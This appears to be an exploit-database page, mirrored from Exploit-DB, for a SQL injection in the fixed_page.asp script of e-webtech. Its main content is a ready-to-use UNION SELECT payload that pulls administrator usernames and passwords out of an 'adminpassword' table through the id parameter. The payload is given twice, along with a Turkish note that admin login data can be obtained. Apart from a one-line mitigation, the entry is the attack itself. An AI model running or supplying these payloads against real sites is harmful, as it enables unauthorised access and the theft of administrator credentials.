header-logo
Suggest Exploit
vendor:
fixed_page.asp
by:
Fl0riX
N/A
CVSS
N/A
SQL Injection
89
CWE
Product Name: fixed_page.asp
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
N/A

e-webtech (fixed_page.asp) SQL Injection Vulnerability

Admin login bilgileri alinabilir. Demo Vuln: http://[site]/fixed_page.asp?id=[SQL Inj.], User Exploit:null+union+all+select+1,username+from+adminpassword, Password Exploit:null+union+all+select+1,pw+from+adminpassword

Mitigation:

Input validation and sanitization should be done to prevent SQL injection attacks.
Source

Exploit-DB raw data:

####################################################
    e-webtech (fixed_page.asp) SQL Injection Vulnerability 
####################################################
# Author   : Fl0riX 
# 
# Name     : e-webtech
# 
# Bug Type   : SQL Injection 
# 
# Infection    : Admin login bilgileri alinabilir. 
# 
# Demo Vuln : 
# 
# http://[site]/fixed_page.asp?id=[SQL Inj.]
#
# User Exploit:null+union+all+select+1,username+from+adminpassword
# Password Exploit:null+union+all+select+1,pw+from+adminpassword
####################################################

Navigation

Suggest Exploit

Services By CQR